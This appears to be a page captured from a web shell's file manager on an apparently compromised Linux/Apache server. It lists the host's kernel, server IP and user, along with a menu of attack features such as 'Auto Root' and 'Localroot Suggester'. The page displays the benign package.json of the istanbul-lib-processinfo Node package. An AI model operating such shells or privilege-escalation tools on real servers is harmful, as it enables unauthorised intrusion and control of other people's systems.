Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
istanbul-lib-processinfo /
Delete
Unzip
Name
Size
Permission
Date
Action
index.js
8.63
KB
-rw-r--r--
2023-08-21 05:40
package.json
829
B
-rw-r--r--
2023-08-21 05:40
pkgjs-lock.json
1.01
KB
-rw-r--r--
2023-08-21 05:40
Save
Rename
{ "name": "istanbul-lib-processinfo", "version": "2.0.3", "description": "A utility for managing the `processinfo` folder that NYC uses.", "main": "index.js", "scripts": { "test": "tap", "snap": "tap", "release": "standard-version" }, "repository": { "type": "git", "url": "git+https://github.com/istanbuljs/istanbul-lib-processinfo.git" }, "license": "ISC", "dependencies": { "archy": "^1.0.0", "istanbul-lib-coverage": "^3.2.0", "p-map": "^3.0.0", "rimraf": "^3.0.0", "uuid": "^8.3.2" }, "devDependencies": { "standard-version": "^7.0.0", "tap": "^15.1.5", "nyc": "^15.1.0" }, "engines": { "node": ">=8" }, "tap": { "check-coverage": true, "jobs": 1 }, "files": [ "index.js" ], "nyc": { "include": "index.js" } }